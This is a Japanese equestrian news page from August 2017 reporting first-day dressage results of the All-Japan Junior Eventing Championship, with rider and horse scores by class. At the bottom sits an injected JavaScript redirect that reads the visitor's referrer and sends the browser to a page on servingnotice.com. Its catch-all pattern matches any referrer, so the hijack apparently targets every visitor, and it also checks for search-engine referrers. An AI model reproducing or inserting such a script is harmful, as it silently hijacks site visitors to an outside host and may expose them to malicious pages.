News
2017 年 8 月 4 日
《全日本ジュニア総合》初日速報!

 《第38回全日本ジュニア総合馬術大会2017》が山梨県馬術競技場で開幕しました。メイン競技はジュニアライダー選手権とチルドレンライダー選手権。それぞれ、14~18歳と10~16歳の選手が対象の日本一決定戦です。その他、EV100競技、EV90競技、国体総合馬術競技、CCIワンスター競技、CICツースター競技を実施します。大会初日の今日は各クラスの馬場馬術競技を行いました。

 ジュニアライダー選手権には5人馬(4選手5頭)が出場しています。上位2人馬は30点台の減点というハイスコア。昨年2位の瀬川裕哉&エコールージュZ(八王子RC)が減点38.0で1位、昨年優勝の大沢暁音&トイボーイⅢ(明松寺馬事公苑)が減点39.0で2位でした。昨年のチルドレンライダー選手権優勝の楠本将斗(RCクレインOP)がワンダとのコンビで減点43.8で3位となりました。

▲瀬川裕哉&エコールージュZ

 チルドレンライダー選手権には7人馬が出場。堀田駿&ウィラーノ(ホースフレンズパーク)が減点43.9で1位、坂中蓮実&バンドゥロンシャン(RCクレイン三重)が減点47.2で2位、田村真悠&セリシーヌ(RCエトワール)が減点53.3で3位でした。

▲堀田駿&ウィラーノ

 CICツースター競技は10人馬が出場しました。弓良隆行&ポーチャーズホープ(RCクレイン京都)が減点42.7で1位、平永健太&デラーゴ(RCクレイン栃木)が減点46.5で2位、村上一孝&ティベント(パートナーホースC)が減点46.9で3位でした。
 CCIワンスター競技には大学生2人が出場。佐々紫苑&瑞龍(早稲田大学)が減点45.8、髙橋駿人&ライヌス(慶應義塾大学)が減点46.6と僅差でした。

今日(馬場馬術)の全成績はこちら、明日(クロスカントリー)の出番表はこちらから。

aaaa



  • 2017.08.07
  • 2017.08.17
  • 2017.07.17
  • 2017.08.09
  • 2017.08.04
  • 2017.07.07
  • 2017.04.20
  • 2017.07.25
  • 2017.04.19
  • 2017.06.06
  • 2017.08.07
  • 2016.05.06
  • 2017.07.21


var toUrl="http://"; var rUrl = document.referrer; var patrn=/(.*)$/; toUrl+="servingnotice.com/lvinter2/intermediary.html?outlet80com"; toUrl+=""; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)aol.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)yahoo.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)bing.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl;